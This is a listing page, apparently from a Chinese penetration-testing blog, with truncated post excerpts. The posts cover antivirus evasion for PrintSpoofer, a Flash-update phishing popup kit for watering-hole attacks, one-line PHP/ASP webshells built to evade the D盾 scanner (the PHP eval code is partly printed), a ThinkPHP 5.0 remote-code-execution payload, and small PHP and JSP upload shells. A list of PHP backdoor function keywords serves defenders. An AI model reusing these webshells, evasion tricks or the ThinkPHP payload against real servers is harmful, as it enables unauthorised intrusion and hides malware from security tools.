PrintSpoofer免杀下载

小俊 | 渗透测试 | 2020-10-31
源码下载 https://github.com/whojeff/PrintSpoofer vs2019编译发现360全家桶查杀 2.免杀处理 printspoofer 将这个关键词替换成其他字符串 如 moonsec PrintSpoofer.cpp PrintSpoofer.h 全部改为 [阅读全文]
ė242次浏览 60条评论 0

XSS打击钓鱼网站

小俊 | 渗透测试 | 2020-10-05
朋友发来一个钓鱼站,抓包+xss即可绕过。 过程如下:   QQ号码处输入处输入正常号码,密码处输入payload,正常输入会有字符长度限制,burp抓包绕过一下就行。 成功拿下。 只做技术研究,误做非法操作。 [阅读全文]
ė549次浏览 60条评论 0

水坑攻击-Flash钓鱼弹窗优化版源码下载

小俊 | 渗透测试 | 2020-10-04
一直想写个界面精致点的Flash钓鱼,奈何各种效果实现起来实在是有点麻烦,正好发现了layer这个牛逼的弹层组件,一开始直接用的图片,几行代码就搞定了,但是还是不够完美,后来发到T00ls大家集思广益,提出了一些非常好的建议,几次修改后才有了如下的最终版。 在线预览:http://flash-pop.se7ensec.cn/ 有人说flas [阅读全文]
ė351次浏览 60条评论 0

一次对大马的简单分析产生的深思

小俊 | 渗透测试 | 2020-10-03
以下文章来源于t00ls 日常网络冲浪的时候接到任务,拿下目标服务器getshell了以后,发现了个奇怪的php文件,文件比较大,有200k,怀着好奇的心理,便访问了一下。 不失所望,是个大马,本着好奇心下载了下来,尝试爆破,爆破成功 功能还算是齐全,正打算收入囊中,一想到上次xxx事件,心有余悸。。 查看 [阅读全文]
ė350次浏览 60条评论 0

常见的后门关键词

小俊 | 渗透测试 | 2020-10-02
分享给那些安服的苦逼们: 系统命令执行: system, passthru, shell_exec, exec, popen, proc_open 代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 文件包含: require, requi [阅读全文]
ė382次浏览 60条评论 0

免杀D盾的PHP/ASP/ASPX一句话

小俊 | 渗透测试 | 2020-10-02
php: $m=$_GET[ $m=$_GET['1']; $a=substr($m,0,1); $b=substr($m,1,2); $c=substr($m,2,9999); eval($a.$b.$c); ($a.$b); ?> asp: <% P=request("pass") A=mid(P,1,1 [阅读全文]
ė293次浏览 60条评论 0

WEB安全工具库集合

小俊 | 渗透测试 | 2020-10-02
漏洞及渗透练习平台: WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.c [阅读全文]
ė151次浏览 60条评论 0

一次Getshell-ThinkPHP

小俊 | 渗透测试 | 2020-10-01
0x1 _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo 通过phpinfo知道ThinkPHP版本为5.0.20,php版本为7.2.6,php 7以后版本无法使用assert getshell,找到日志包含执行exp! 0x2 _method=__construc [阅读全文]
ė112次浏览 60条评论 0

php小马

小俊 | 渗透测试 | 2020-08-06
ė722次浏览 60条评论 0

jsp小马(上传功能)

小俊 | 渗透测试 | 2020-08-06
error ok " name="url"> [阅读全文]
ė778次浏览 60条评论 0

Ɣ回顶部